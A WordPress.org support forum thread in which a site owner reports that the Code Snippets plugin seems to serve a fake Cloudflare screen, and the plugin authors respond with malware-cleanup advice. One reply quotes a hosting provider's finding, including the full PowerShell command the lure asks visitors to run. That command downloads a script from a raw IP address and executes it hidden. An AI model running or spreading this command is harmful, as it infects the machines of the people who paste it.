Virus alert on Code Snippets Plugin

Resolved Bruno Martinez
(@brmartinez)

5 months ago

Hello, I’ve recently noticed that this plugin is infected with a virus that shows a “fake cloudlfare” screen. It instructs the user to copy and past a code in the the command screen (Windows CMD). https://www.loom.com/share/2d5e34d7bb074b219bdbe2511dc5af2b?sid=0bd6a140-3177-458c-b352-5a1966916106

Please be aware this is happening and check if you can make it more secure. I’ve had to remove the plugin, to fix the virus issue on my website.

Thanks!

Viewing 9 replies - 1 through 9 (of 9 total)

Jeff Mankini
(@jeffmankini)

5 months ago

Hi Bruno,

It looks like your site may be infected with malware. From what I can see, this doesn’t appear to be coming from the Code Snippets plugin itself, but rather from a malicious script that’s been added somewhere on your site.

Do you happen to recall any of the last few snippets you may have added? That might help us narrow down where this could be coming from.

Cheers,

Jeff
The Code Snippets Team
Thread Starter Bruno Martinez
(@brmartinez)

4 months, 3 weeks ago
Hello, answering your inquiries:
1. No, the malware script was found in your plugin. Removing your plugin removed the virus. We’ve tried this twice (reinstalling it opened the door for a new infection, so we’ve had to remove it again);
2. No, we’re not using your plugin anymore, and since then, we haven’t had any infections (its a pitty, actually, because your plugin is really great. Congrats for that, by the way).
Here’s a list of all our snippets:
```
Rank Math Rules Exclusions (PHP)

===============================

/**

 * Filter to disable some tests

 */

add_filter('rank_math/researches/tests', function ($tests, $type) {

unset($tests['titleHasNumber']);

unset($tests['lengthPermalink']);

unset($tests['hasContentAI']);

unset($tests['keywordInMetaDescription']);

    unset($tests['contentHasTOC']);

unset($tests['keywordDensity']);

unset($tests['keywordInSubheadings']);

unset($tests['lengthContent']);

return $tests;

}, 10, 2 );

Rank Math Filter to change the Post Meta Table Limit (PHP)

=============================== 

/**

 * Filter to change the Post Meta Table Limit

 */

add_filter('rank_math/seo_analysis/postmeta_table_limit', function ( $limit ) {

return 5000000;

}

);

RankMath Clear flush sitemap cache (PHP)

=============================== 

add_filter( 'rank_math/sitemap/enable_caching', '__return_false');
Rank Math Filter Fast indexing API error fix (PHP)

add_filter( 'doing_it_wrong_trigger_error', '__return_false' );

Filter to add Locations KML file in the sitemap (PHP) 

=============================== 

/**

 * Filter to add Locations KML file in the sitemap

 */

add_filter( 'rank_math/sitemap/locations', '__return_true' );

Modify imagify picture tag (PHP)

=============================== 

add_filter( 'imagify_buffer', function( $html ) {

    // Apply changes only inside <div class="cs-overlay-background"> blocks

    $html = preg_replace_callback(

        '#<div[^>]*class=["\'][^"\']*cs-overlay-background[^"\']*["\'][^>]*>(.*?)</div>#is',

        function ( $divMatches ) {

            $divContent = $divMatches[1];

            // Modify picture tags WITH style attribute

            $divContent = preg_replace_callback(

                '/<picture([^>]*?)style\s*=\s*["\']([^"\']*)["\']([^>]*)>/i',

                function ( $matches ) {

                    $style = $matches[2];

                    if ( stripos( $style, 'height' ) === false ) {

                        $style = rtrim( $style, '; ' ) . '; height:100%;';

                    }

                    return '<picture' . $matches[1] . 'style="' . $style . '"' . $matches[3] . '>';

                },

                $divContent

            );

            // Modify picture tags WITHOUT style attribute

            $divContent = preg_replace(

                '/<picture(?![^>]*\bstyle=)([^>]*)>/i',

                '<picture style="height:100%;"$1>',

                $divContent

            );

            // Return modified div

            return str_replace($divMatches[1], $divContent, $divMatches[0]);

        },

        $html

    );

    return $html;

} );

Mastodon Tag (HTML)

=============================== 

<meta name="fediverse:creator" content="@[email protected]">
```
if you need anything else, just let me know.

Kind regards and thanks for helping out! 🙂
Plugin Author Shea Bunge
(@bungeshea)

4 months, 3 weeks ago

Hi @brmartinez,

I can confirm we don’t have anything remotely like that in the distributed plugin – we don’t even have anything to do with CloudFlare.

It’s possible that your copy of the plugin became infected somehow, and if so, it points to a vulnerability in your system that I’d definitely recommend trying to identify. Once dealt with, redownloading a fresh copy of the plugin from this site should resolve issues.

Thread Starter Bruno Martinez
(@brmartinez)

4 months, 3 weeks ago

By your answer, it seems you didn’t understand how the virus works: it SIMULATES a FAKE CloudFlare screen. So it does not relate to the official Cloudflare service at all, ok?

I’ve removed the plugin, then reinstalled it. After a few days, the virus returned.

In my latest test, I’ve now removed the plugin again, then deleted leftover tables from it, and installed it again. I’ll let you know if the virus returns.

Plugin Author Shea Bunge
(@bungeshea)

4 months, 3 weeks ago

I understand your description of what’s happening – I was suggesting the improbability of it being tied up with the distributed plugin code as the behaviour you describe is not remotely close to the plugin’s functionality.

Can I ask where you found the malware script in the plugin? Which source file etc?

Thread Starter Bruno Martinez
(@brmartinez)

4 months, 3 weeks ago

The devs at my server found it. Here’s what they’ve explained to me in July 10th:

“We’ve found malware on your site and the same was related to the ” code-snippets ” plugin. This malware is particularly dangerous, as shows a fake Cloudflare screen that prompts the user to execute of a PowerShell command that downloads and runs a script:

powershell -w h -c “$f=$env:TEMP+’\\’+[guid]::NewGuid()+’.ps1′;curl http://185.100.157.79/wXq.dof -o $f;powershell -w h -ep Bypass -f $f”

Currently, the plugin is enabled, and if you disable it, the required authentication (fake Cloudflare page) will not be presented.”
Plugin Author Imants
(@0aksmith)

4 months, 3 weeks ago
Hi @brmartinez,

Thanks so much for following up and sharing the details.
I really appreciate the time you’ve taken to test and report what you’re seeing.

From your description, it does sound like the Code Snippets plugin may be getting leveraged directly, or as part of a broader exploit chain, especially given the flexibility it offers for running custom code. I completely understand how concerning this must be, and I want to reassure you that we take this seriously.

Here are some steps we recommend to help secure and restore your WordPress site:
- Activate Code Snippets Safe Mode:
  This pauses all snippets so you can safely access your site and troubleshoot without executing custom code. See: Help! My site broke! How can I fix it?
- Reinstall WordPress Core:
  Replace all core WordPress files with fresh copies to eliminate any hidden backdoors.
- Check and Clean Critical Directories:
  - Look through the uploads folder for any unfamiliar files.
  - Review post content, custom fields, and database entries for hidden or obfuscated scripts.
  - Inspect your wp-config.php file for any unauthorized changes.
- Audit Users and Permissions:
  - Remove any unknown admin users.
  - Update passwords for all admin accounts, and change your database and FTP credentials.
- Update All Plugins and Themes:
  - Remove any unused or untrusted plugins/themes.
  - Make sure everything is running the latest secure version.
- Restore from a Clean Backup (if available):
  If you have a backup from before the issue started, restoring it can be a great way to get back to a clean state.
- Scan for Malware and Vulnerabilities:
  Use a trusted security plugin like Patchstack, Wordfence, Sucuri, or Jetpack Protect to scan your site for hacked files, suspicious code, or vulnerabilities.
- Review Recent Snippets:
  - Disable or delete any snippets that you didn’t add or that look suspicious.
  - Look out for snippets that could allow uploads or remote code execution.
Also, just a quick note: when sharing examples or links, please try to remove or redact any direct URLs in malicious payloads, like: http[:]//cant.click/here
This helps keep others safe from accidentally clicking on them.

If you ever come across a vulnerability in the plugin itself, we’d really appreciate it if you could contact us directly here: https://codesnippets.pro/contact/
Thread Starter Bruno Martinez
(@brmartinez)

4 months, 3 weeks ago

Thanks. Can someone in your team be available to help me out with these tasks? I’m not a developer and I don’t have one, so I won’t be able to follow on this alone.

Plugin Author Imants
(@0aksmith)

4 months, 3 weeks ago

Bruno.
Our team specializes primarily in plugin development, so when it comes to dealing with security issues or cleaning up malicious files, your hosting provider is often best equipped to help.

Given the gravity of the exploit found on your site, I highly recommend reaching out to professional WordPress incident response services as they will have the expertise and tools to help you fully secure, recover and protect your website.

Viewing 9 replies - 1 through 9 (of 9 total)

You must be logged in to reply to this topic.